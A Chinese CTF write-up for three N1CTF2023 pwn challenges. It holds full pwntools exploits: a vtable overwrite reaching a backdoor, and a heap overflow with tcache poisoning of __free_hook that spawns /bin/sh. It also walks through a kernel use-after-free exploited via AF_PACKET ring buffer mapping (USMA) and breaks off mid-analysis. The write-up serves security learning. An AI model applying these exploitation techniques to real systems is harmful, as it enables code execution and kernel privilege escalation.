0%

N1CTF2023

n1canary

1
2
3
4
5
6
a.out: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=c1041d9d57f3f4dc0ad3e3ebb251ea748a0832d8, for GNU/Linux 4.4.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,statically,Partial RELRO,Canary,NX

漏洞分析

栈溢出漏洞:

1
2
3
puts("input something to pwn :)");
ProtectedBuffer<64ul>::mut<BOFApp::launch(void)::{lambda(char *)#1}>((__int64)v3, (__int64)&v2);
puts(v3);
1
2
3
4
// Decompiled call operator of the lambda that BOFApp::launch hands to ProtectedBuffer<64>::mut.
// a1 is the closure object (unused in this body); a2 is the destination buffer pointer.
// The "%[^\n]" conversion carries no field width, so every byte up to the next newline
// is stored through a2 regardless of how large the destination is.
__int64 __fastcall BOFApp::launch(void)::{lambda(char *)#1}::operator()(__int64 a1, __int64 a2)
{
return _isoc23_scanf((__int64)"%[^\n]", a2);
}

有后门函数:

1
2
3
4
// Decompiled backdoor: runs the "/readflag" program through system() and returns its status.
__int64 backdoor(void)
{
return system("/readflag");
}

入侵思路

程序自定义了一个栈保护,使用 sys_getrandom 获取随机数生成 canary,这个 canary 几乎是不可能绕过的

程序使用了智能指针 unique_ptr,因此在当前语句块结束时会调用 BOFApp 的析构函数:

1
2
3
4
std::make_unique<BOFApp>((__int64)v6);
v4 = std::unique_ptr<BOFApp>::operator->((__int64)v6);
(*(void (__fastcall **)(__int64))(*(_QWORD *)v4 + 16LL))(v4);
std::unique_ptr<BOFApp>::~unique_ptr((__int64)v6);

并且 BOFApp 类本身具有虚函数,其虚表可以被我们覆盖:

1
2
3
4
5
6
7
8
9
10
pwndbg> telescope 0x7ffe4b0afa80
00:0000│ rax rdi 0x7ffe4b0afa80 ◂— 0x0
... ↓ 7 skipped
08:0040│ 0x7ffe4b0afac0 ◂— 0x0
09:0048│ 0x7ffe4b0afac8 ◂— 0xda64322f1f19d59
0a:0050│ 0x7ffe4b0afad0 —▸ 0x7ffe4b0afc28 —▸ 0x7ffe4b0b02a6 ◂— 'HTTP_PROXY=http://127.0.0.1:7890/'
0b:0058│ 0x7ffe4b0afad8 ◂— 0x7c3b282cea4eec00
0c:0060│ 0x7ffe4b0afae0 —▸ 0x7ffe4b0afc18 —▸ 0x7ffe4b0b029e ◂— 0x74756f2e612f2e /* './a.out' */
0d:0068│ 0x7ffe4b0afae8 —▸ 0x403407 (main+103) ◂— mov rax, rsp
0e:0070│ 0x7ffe4b0afaf0 —▸ 0x6b3730 —▸ 0x4ed510 (__preinit_array_start+48) —▸ 0x40388c (BOFApp::~BOFApp()) ◂— sub rsp, 18h
1
2
3
4
pwndbg> telescope 0x4ed510
00:0000│ 0x4ed510 (__preinit_array_start+48) —▸ 0x40388c (BOFApp::~BOFApp()) ◂— sub rsp, 18h
01:0008│ 0x4ed518 (__preinit_array_start+56) —▸ 0x4038b8 (BOFApp::~BOFApp()) ◂— sub rsp, 18h
02:0010│ 0x4ed520 (__preinit_array_start+64) —▸ 0x403552 (BOFApp::launch()) ◂— sub rsp, 88h

核心思路就是覆盖虚表,使其执行后门函数

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# -*- coding:utf-8 -*-
# Exploit script for n1canary: plants a fake vtable, then overflows the stack
# buffer so that the BOFApp pointer is redirected to it.
from pwn import *

arch = 64
challenge = './a.out'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

# Short aliases around the tube object `p` (bound below, before any alias is called).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# lg takes the *name* of a variable and logs its value in colour.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad byte must be a single NUL; a multi-byte fill makes bytes.ljust raise TypeError.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach gdb with a breakpoint at 0x403909 and wait for the user."""
    gdb.attach(p,"b* 0x403909\n")
    #gdb.attach(p,"b *$rebase()\n")
    pause()

def cmd(op):
    """Send a menu choice after the '>' prompt."""
    sla(">",str(op))

#debug()

vtable_addr = 0x4F4AA0
backdoor = 0x403387

# Fake object/vtable, 0x40 bytes: first qword points back at vtable_addr,
# second qword is the backdoor address.
# NOTE(review): vtable_addr is presumably where the "canary" input is stored - confirm.
vtable = p64(vtable_addr)
vtable += p64(backdoor)
vtable = vtable.ljust(0x40,b'\x00')

sa("canary",vtable)
# 0x68 filler bytes, then 0x403407 (the value the stack dump shows at offset 0x68,
# main+103) written back unchanged, then the qword at offset 0x70 - which held the
# BOFApp pointer in the dump - replaced with vtable_addr.
sla("pwn :)",b'a'*0x68+p64(0x403407)+p64(vtable_addr))

p.interactive()

n1array

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.7) stable release version 2.31.
1
2
3
4
5
6
pwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=bf9f13ff31aa3f4c4036ab8bf12e14f3abe0d287, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

程序分析

程序维护了一个 hashTable,每个条目都是一个 Chunk 结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
00000000 Chunk struc ; (sizeof=0x40, mappedto_21)
00000000 nelts dd ?
00000004 field_4 dd ?
00000008 atom dq ? ; offset
00000010 name_len dd ?
00000014 field_14 dd ?
00000018 name dq ? ; offset
00000020 value2 dd ?
00000024 value_nelts dd ?
00000028 value dq ? ; offset
00000030 type_nelts dd ?
00000034 field_34 dd ?
00000038 type_key dq ? ; offset
00000040 Chunk ends

其中记录了三种 Atom(name,type,value):

  • name:用于索引 hashTable
  • value:有两种模式
1
2
3
4
5
6
7
8
9
10
if ( a2->key )
{
chunk->value2 = a2->value2; /* 使用value2(整个数组的数据为同一个值) */
}
else
{
if ( (unsigned __int64)(4 * chunk->value_nelts) + 0x14 > a2->len )
__assert_fail("array->value.nelts * 4 + sizeof(struct ValueAtom) <= atom->len", "pwn.c", 0x8Du, "parseValueAtom");
chunk->value = (int *)&a2->value; /* 使用value数组(分别指定数组数据的每一个值) */
}

通过逆向分析,得出三种 Atom 的输入格式如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def value_atom(nelts, value:list, key=0, value2=0):
    """Serialize a value atom.

    Layout (32-bit fields, packed with p32): len | type(=1) | key | value2 | nelts | value...
    `len` counts the whole atom including the length field itself.
    `nelts` is written as given and is NOT derived from len(value), so the
    caller may declare more elements than it actually supplies.
    """
    # len | type | key | value2 | nelts | value
    value_data = b"".join([p32(i) for i in value])
    tmp = p32(1) + p32(key) + p32(value2) + p32(nelts) + value_data
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def type_atom(nelts, type:list):
    """Serialize a type atom.

    Layout: len (p32) | type(=2, p32) | nelts (p32) | one byte per entry of `type` (p8).
    `len` counts the whole atom including the length field itself.
    """
    # len | type | nelts | type
    type_data = b"".join([p8(t) for t in type])
    tmp = p32(2) + p32(nelts) + type_data
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def name_atom(name:bytes):
    """Serialize a name atom.

    Layout: len (p32) | type(=3, p32) | name_len (p32) | name bytes.
    `len` counts the whole atom including the length field itself.
    """
    # len | type | name_len | name
    tmp = p32(3) + p32(len(name)) + name
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

漏洞分析

该题目的漏洞点比较隐秘,其核心在于 chunk->nelts 可能被重复写入:

1
2
3
4
5
6
7
8
9
10
11
chunk->value_nelts = type->nelts;
if ( type->key )
{
chunk->value2 = type->value2;
}
else
{
if ( (unsigned __int64)(4 * chunk->value_nelts) + 0x14 > type->len )
__assert_fail("array->value.nelts * 4 + sizeof(struct ValueAtom) <= atom->len", "pwn.c", 0x8Du, "parseValueAtom");
chunk->value = (int *)&type->value;
}

当我们先写入一次 chunk->value,再写入更长的 chunk->value2 时就会触发这个漏洞,此时 chunk->nelts 会覆盖为 chunk->value2 的长度,但程序大部分功能仍然优先使用 chunk->value

1
2
3
4
5
6
7
8
9
10
11
if ( a1->value )
{
for ( i = 0; a1->nelts > i; ++i )
printVal(a1->value[i], a1->type_key[i]);
}
else
{
value2 = a1->value2;
for ( j = 0; a1->nelts > j; ++j )
printVal(value2, a1->type_key[j]);
}

这就导致了堆溢出

入侵思路

先利用堆溢出泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Entry "1111": a 1-element value array first, then a second value atom with key=1
# that declares nelts=0x100, so the element count grows while the short array stays in use.
payload = type_atom(0x100, [0]*0x100) + name_atom(b"1111\x00") + value_atom(1, [0x1000]*1) + value_atom(0x100, [0x1000], 1, 0)
hash(payload)
# Entry "2222": a genuine 0x100-element array; it is deleted right after.
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2222\x00") + value_atom(0x100, [0x1000]*0x100)
hash(payload)

dele(b"2222\x00")
# Printing "1111" now walks 0x100 elements starting from the 1-element array.
show(b"1111\x00")

ru(" 0 0 1 2952790016 ")
# NOTE(review): eval() runs on bytes received from the target; int() would be the safer parse.
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr2 = eval(ru(" "))
success("leak_addr2 >> "+hex(leak_addr2))

# Rebuild a pointer that straddles two printed 32-bit elements: leak_addr1 supplies
# bits 8..39, the low byte of leak_addr2 supplies bits 40..47, and the lowest byte is taken as 0.
leak_addr = (leak_addr2 & 0xff)*0x10000000000+leak_addr1*0x100
heap_base = leak_addr-0x300
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

ru(" 5 3758096384 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
# Same reconstruction, with the top byte hard-coded to 0x7f instead of being read.
leak_addr = (0x7f & 0xff)*0x10000000000+leak_addr1*0x100
libc_base = leak_addr-0x1ecb00
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

最后劫持 tcache 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
# -*- coding:utf-8 -*-
# Exploit script for n1array: leaks heap and libc pointers through the oversized
# element count, then redirects an allocation to __free_hook.
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

# Short aliases around the tube object `p` (bound below, before any alias is called).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# lg takes the *name* of a variable and logs its value in colour.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad byte must be a single NUL; a multi-byte fill makes bytes.ljust raise TypeError.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach gdb with a breakpoint at PIE offset 0x18DD."""
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0x18DD)\n")
    #pause()

def value_atom(nelts, value:list, key=0, value2=0):
    """Serialize a value atom; `nelts` is written as given, not derived from len(value)."""
    # len | type | key | value2 | nelts | value
    value_data = b"".join([p32(i) for i in value])
    tmp = p32(1) + p32(key) + p32(value2) + p32(nelts) + value_data
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def type_atom(nelts, type:list):
    """Serialize a type atom: one byte per entry of `type`."""
    # len | type | nelts | type
    type_data = b"".join([p8(t) for t in type])
    tmp = p32(2) + p32(nelts) + type_data
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def name_atom(name:bytes):
    """Serialize a name atom carrying `name` and its length."""
    # len | type | name_len | name
    tmp = p32(3) + p32(len(name)) + name
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def cmd(op):
    """Send a menu choice after the 'cmd>>' prompt."""
    sla("cmd>>",str(op))

def hash(data:bytes):
    """Menu option 0: submit a blob of concatenated atoms (shadows the builtin `hash`)."""
    # data_len | 0 | data
    cmd(0)
    ru("atom>>")
    p.send(p32(len(data)+8))
    p.send(p32(0)+data)

def dele(name):
    """Menu option 2: delete the entry called `name`."""
    cmd(2)
    sla("name>>",name)

def show(name):
    """Menu option 1: print the entry called `name`."""
    cmd(1)
    sla("name>>",name)

def edit(name,index,data):
    """Menu option 3: write the integer `data` into element `index` of entry `name`."""
    cmd(3)
    sla("name>>",name)
    sla("Input Index: ",str(index))
    sla("Input New Val: ",str(data))

#debug()

# Entry "1111": a 1-element value array first, then a second value atom with key=1
# that declares nelts=0x100, so the element count grows while the short array stays in use.
payload = type_atom(0x100, [0]*0x100) + name_atom(b"1111\x00") + value_atom(1, [0x1000]*1) + value_atom(0x100, [0x1000], 1, 0)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2222\x00") + value_atom(0x100, [0x1000]*0x100)
hash(payload)

dele(b"2222\x00")
show(b"1111\x00")

ru(" 0 0 1 2952790016 ")
# NOTE(review): eval() runs on bytes received from the target; int() would be the safer parse.
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr2 = eval(ru(" "))
success("leak_addr2 >> "+hex(leak_addr2))

# Rebuild a pointer that straddles two printed 32-bit elements: leak_addr1 supplies
# bits 8..39, the low byte of leak_addr2 supplies bits 40..47, and the lowest byte is taken as 0.
leak_addr = (leak_addr2 & 0xff)*0x10000000000+leak_addr1*0x100
heap_base = leak_addr-0x300
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

ru(" 5 3758096384 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
# Same reconstruction, with the top byte hard-coded to 0x7f instead of being read.
leak_addr = (0x7f & 0xff)*0x10000000000+leak_addr1*0x100
libc_base = leak_addr-0x1ecb00
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base+libc.sym["__free_hook"]
system = libc_base+libc.sym["system"]
binsh = libc_base+next(libc.search(b"/bin/sh"))
success("free_hook >> "+hex(free_hook))
success("system >> "+hex(system))

# Three short-lived entries are created and deleted to leave freed chunks behind.
payload = type_atom(0x100, [0]*0x100) + name_atom(b"1\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"3\x00") + value_atom(1, [0x1000]*1)
hash(payload)

dele(b"1\x00")
dele(b"2\x00")
dele(b"3\x00")

# Write free_hook across three adjacent 32-bit elements of "1111", using the same
# one-byte-shifted layout as the leak: the low byte goes into the top byte of element
# 0x100-3, bits 8..39 into element 0x100-2, and the remaining bits into element 0x100-1.
# NOTE(review): presumably this overwrites a freed chunk's tcache next pointer - confirm in gdb.
data = (free_hook >> 8) & 0xffffffff
edit(b"1111\x00",0x100-2,data)
data = (free_hook >> 40) & 0xffffffff
edit(b"1111\x00",0x100-1,data)
data = (free_hook & 0xff) * 0x1000000
edit(b"1111\x00",0x100-3,data)

# The first name carries the shell command; the second name is the address of system().
payload = type_atom(0x100, [0]*0x100) + name_atom(b"a"*0x10+b";/bin/sh\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(p64(system)) + value_atom(1, [0x1000]*1)
hash(payload)

# Deleting the command-carrying entry is the final trigger.
dele(b"a"*0x10+b";/bin/sh\x00")

p.interactive()

n1sub

1
2
~ $ cat /proc/version 
Linux version 6.1.58 (chuj@pwn-host.nixos) (gcc (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #1 SMP PREEMPT_DYNAMIC Mon Oct 16 12:23:54 CST 2023
1
2
3
4
5
6
7
8
9
10
11
12
# Boot the challenge kernel in QEMU: 512M of RAM, bzImage with rootfs.cpio as initrd,
# serial console, "kaslr" on the kernel command line, SMEP and SMAP enabled on the CPU
# model, two cores, no graphics, and -s to open the gdb stub.
qemu-system-x86_64 \
-m 512M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-append 'console=ttyS0 kaslr quiet loglevel=3 oops=panic panic=-1' \
-netdev user,id=net \
-device e1000,netdev=net \
-no-reboot \
-monitor /dev/null \
-cpu qemu64,+smep,+smap \
-smp cores=2,threads=1 \
-nographic -s
  • smep,smap,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/sh
# Guest init script: mounts the pseudo filesystems, loads the challenge module
# and drops into an unprivileged shell.
mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs none /tmp
mount -t devtmpfs none /dev
# Redirect stdin/stdout/stderr to the console device.
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
# Set kptr_restrict and dmesg_restrict to 1.
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
# Load the challenge module and make its device node readable and writable by everyone.
insmod /sub.ko
chmod 666 /dev/n1sub
setsid /bin/cttyhack setuidgid 1000 /bin/sh #normal user
# Runs once the shell above exits: unmount and power off.
umount /proc
umount /sys
poweroff -d 0 -f

题目给了配置文件,有些内核保护并没有开启:

1
2
3
4
# CONFIG_MEMCG is not set /* 关闭内存控制器(GFP_KERNEL和GFP_ACCOUNT之间没有隔离) */
# CONFIG_SLAB_FREELIST_RANDOM is not set /* 关闭slab freelist随机化 */
# CONFIG_SLAB_FREELIST_HARDENED is not set
# CONFIG_SLUB_STATS is not set

漏洞分析

UAF 漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
if ( cmd == 0xDEADBEE1 )                      // dele
{
if ( arg > 2 )
goto LABEL_4;
if ( !bufs_free[arg] )
{
kfree(bufs[arg]);
bufs_free[arg] = 1;
}
raw_spin_unlock(&ioctl_lock);
return 0;
}

USMA 用户态映射攻击

在 Linux 内核中的 packet socket 模块可以让用户在设备驱动层接受和发送 raw packets,并且为了加速数据报文的拷贝,它允许用户创建一块与内核态共享的环形缓冲区:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Allocate the pgv array for a packet ring: one struct pgv per requested block,
 * each filled in with a buffer obtained from alloc_one_pg_vec_page(order).
 * Returns the array, or NULL if the array or any block buffer cannot be allocated.
 */
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

/* The array itself is block_nr * sizeof(struct pgv) bytes, so its size follows tp_block_nr. */
pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

/* A block allocation failed: release what was built and report NULL. */
out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}
  • pg_vec 实际上是一个保存着连续物理页的虚拟地址的数组,而这些虚拟地址会被 packet_mmap 函数所使用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
/*
 * mmap handler for packet sockets: inserts every page referenced by the
 * rx and tx rings' pg_vec arrays into the caller's VMA, in order.
 * Returns 0 on success, -EINVAL for a non-zero page offset, an empty ring set
 * or a size mismatch, or the error reported by vm_insert_page().
 */
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
unsigned long size, expected_size;
struct packet_ring_buffer *rb;
unsigned long start;
int err = -EINVAL;
int i;

if (vma->vm_pgoff)
return -EINVAL;

mutex_lock(&po->pg_vec_lock);

/* Total bytes backing every ring that has a pg_vec. */
expected_size = 0;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec) {
expected_size += rb->pg_vec_len
* rb->pg_vec_pages
* PAGE_SIZE;
}
}

if (expected_size == 0)
goto out;

/* The mapping must cover the rings exactly. */
size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;

for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
/* The kernel address is read straight out of the pg_vec entry. */
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
page = pgv_to_page(kaddr);
err = vm_insert_page(vma, start, page); /* insert the page into the user-space virtual address space */
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}

atomic_inc(&po->mapped);
vma->vm_ops = &packet_mmap_ops;
err = 0;

out:
mutex_unlock(&po->pg_vec_lock);
return err;
}
  • packet_mmap 将这些内核虚拟地址代表的物理页映射进用户态,这样普通用户就能在用户态对这些物理页直接进行读写
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 * Insert a single page into a VMA at addr.
 * Returns -EFAULT when addr lies outside the VMA, -EINVAL when the page has a
 * zero reference count, otherwise the result of insert_page().
 */
int vm_insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page)
{
if (addr < vma->vm_start || addr >= vma->vm_end)
return -EFAULT;
if (!page_count(page))
return -EINVAL;
/* First insertion into this VMA: mark it VM_MIXEDMAP. */
if (!(vma->vm_flags & VM_MIXEDMAP)) {
BUG_ON(mmap_read_trylock(vma->vm_mm));
BUG_ON(vma->vm_flags & VM_PFNMAP);
vma->vm_flags |= VM_MIXEDMAP;
}
return insert_page(vma, addr, page, vma->vm_page_prot);
}
EXPORT_SYMBOL(vm_insert_page);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/*
 * Validate the page, look up and lock the PTE for addr, and install the page there.
 * Returns the validation error, -ENOMEM when no PTE can be obtained, or the
 * result of insert_page_into_pte_locked().
 */
static int insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page, pgprot_t prot)
{
struct mm_struct *mm = vma->vm_mm;
int retval;
pte_t *pte;
spinlock_t *ptl;

/* Rejects pages that validate_page_before_insert() refuses. */
retval = validate_page_before_insert(page);
if (retval)
goto out;
retval = -ENOMEM;
pte = get_locked_pte(mm, addr, &ptl);
if (!pte)
goto out;
retval = insert_page_into_pte_locked(mm, pte, addr, page, prot);
pte_unmap_unlock(pte, ptl);
out:
return retval;
}
1
2
3
4
5
6
7
/*
 * Gatekeeper for insert_page(): returns -EINVAL for anonymous pages, slab pages
 * and pages that carry a page type; otherwise flushes the dcache for the page
 * and returns 0.
 */
static int validate_page_before_insert(struct page *page)
{
if (PageAnon(page) || PageSlab(page) || page_has_type(page))
return -EINVAL;
flush_dcache_page(page);
return 0;
}
  • 检查 page 是否为匿名页,是否为 Slab 子系统分配的页,以及 page 是否含有 type
  • 内存页的 type 总共有以下几种:
1
2
3
4
5
#define PG_buddy	0x00000080	/* 伙伴系统中的页 */
#define PG_offline 0x00000100 /* 为内存交换出去的页 */
#define PG_kmemcg 0x00000200 /* 为kmemcg使用 */
#define PG_table 0x00000400 /* 作为页表的页 */
#define PG_guard 0x00000800 /* 作为内存屏障的页 */

通过如下函数快速的创建一个 AF_PACKET 协议的原始套接字:

1
socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); /* AF_PACKET是原始套接字协议,是一种特殊的套接字协议,可以是数据链路层原始套接字 */
1
2
int version = TPACKET_V3;
setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)); /* 设置当前AF_PACKET套接字协议版本为TPACKET_V3 */
1
2
3
4
5
6
7
8
9
10
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_block_size = block_size;
req3.tp_block_nr = block_nr;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = frame_nr;
req3.tp_retire_blk_tov = retire_blk_tov;
req3.tp_sizeof_priv = 0;
req3.tp_feature_req_word = 0;
setsockopt(recv_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3)); /* 创建ring buffer(pg_vec) */

入侵思路

有 UAF 漏洞,但是 size 是随机的:

1
2
size = (unsigned int)get_random_u32() % 0x7B0 + 0x68;
sub_offset = ((unsigned int)get_random_u32() % (size - 0x50) + 0x50) & 0xFFFFFFF8;
  • size = [0x68, 0x817]
  • sub_offset = [0x50, size),并向下对齐到 8 字节

此时需要使用 USMA(用户态映射攻击)

具体思路就是先申请一个 chunk 并读取 sub_size,释放后根据 sub_size 的大小来创建一个与之匹配的 ring buffer(pg_vec),由于程序没有开 slab freelist 随机化,因此这个 UAF 大概率会命中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
   save_status();
bind_core(0);
unshare_setup();
fd = open("/dev/n1sub", O_RDWR);
if (fd < 0)
err_exit("open /dev/n1sub");

int socket_list[0x100];
for (int i = 0; i < 0x80; i++)
socket_list[i] = create_socket_and_alloc_pages(PAGE_SIZE, 1);

sub_size = add();
printf("sub_size: 0x%x\n",sub_size);
printf("sub_offset: 0x%x\n",sub_offset);
int block_nr = sub_size / 0x8;
dele(0);

int packet_fds = packet_socket_setup(PAGE_SIZE, 0x800, block_nr, 0, 1000);

内核模块会以 sub_offset 为偏移来修改 ring buffer(pg_vec) 中的数据(连续物理页的虚拟地址),导致程序映射到非预期的内存空间

  • 当程序执行 mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0) 进行映射时,函数 packet_mmap 会将 ring buffer(pg_vec) 中的各个物理页映射给用户态程序(表现为一个大内存块)
  • 另外 validate_page_before_insert 函数会进行检查,这导致通常情况下可以用于泄露的物理页没法成功映射(匿名页、带有 PG_slab 标记的 slab 页,以及带有 PG_buddy 等 type 的页都会被拒绝,而内核对象大多位于 slab 页中)

之后我们可以通过 sub_offset 来定位非预期物理页的位置,进而打印出非预期的数据

这里的内存扫描有点困难,需要一个可以用于泄露或者劫持程序流程的物理页:

  • 用于泄露的内存页:先关闭内核地址随机化,再打印指针即可
  • 劫持程序的内存页:尝试覆盖指针,看看是否会引发段错误

这里我参考了网上 wp 的方法:先断点到 kfree(bufs[arg]),尝试查找 bufs 所在的内存页

1
2
3
4
5
6
7
8
pwndbg> search -t qword 0xffff888004e12000
Searching for value: b'\x00 \xe1\x04\x80\x88\xff\xff'
<pt> 0xffff888004844358 0xffff888004e12000
<pt> 0xffff888004cc3370 0xffff888004e12000 /* target */
<pt> 0xffff888004d5ad98 0xffff888004e12000
<pt> 0xffff888004e12570 0xffff888004e12000
<pt> 0xffffc90000217d98 0xffff888004e12000
<pt> 0xffffffffc0002370 0xffff888004e12000 /* target */
  • 打印 0xffffffffc0002370 所在内存页
1
2
3
4
5
6
7
pwndbg> telescope 0xffffffffc0002000
00:0000│ 0xffffffffc0002000 ◂— 0x0
01:0008│ 0xffffffffc0002008 —▸ 0xffffffff8293d8c0 ◂— 0xffffffffc0002008
02:0010│ 0xffffffffc0002010 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
03:0018│ 0xffffffffc0002018 ◂— 0x627573 /* 'sub' */
04:0020│ 0xffffffffc0002020 ◂— 0x0
... ↓ 3 skipped
1
2
3
4
5
6
